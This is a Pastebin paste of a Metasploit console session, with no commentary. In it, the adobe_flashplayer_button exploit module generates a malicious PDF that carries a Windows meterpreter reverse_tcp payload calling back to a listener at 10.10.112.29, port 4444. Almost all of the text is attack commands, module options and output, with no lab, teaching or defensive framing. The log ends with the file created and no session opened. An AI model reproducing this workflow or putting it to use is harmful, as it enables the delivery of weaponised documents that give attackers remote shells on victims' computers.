Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf exploit(adobe_flashplayer_button) > how options
- [-] Unknown command: how.
- msf exploit(adobe_flashplayer_button) > show options
- Module options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- FILENAME msf.pdf yes The file name.
- OUTPUTPATH /opt/metasploit3/msf3/data/exploits yes The location of the file.
- Payload options (windows/meterpreter/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique: seh, thread, none, process
- LHOST 10.10.112.29 yes The listen address
- LPORT 4444 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 0 Automatic
- msf exploit(adobe_flashplayer_button) > exploit
- [*] Creating 'msf.pdf' file...
- [*] Generated output file /opt/metasploit3/msf3/data/exploits/msf.pdf
- [*] Exploit completed, but no session was created.
- msf exploit(adobe_flashplayer_button) >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement